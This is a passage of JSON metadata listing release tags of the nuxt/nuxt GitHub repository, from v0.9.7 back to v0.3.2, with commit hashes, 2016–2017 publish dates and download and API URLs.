/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d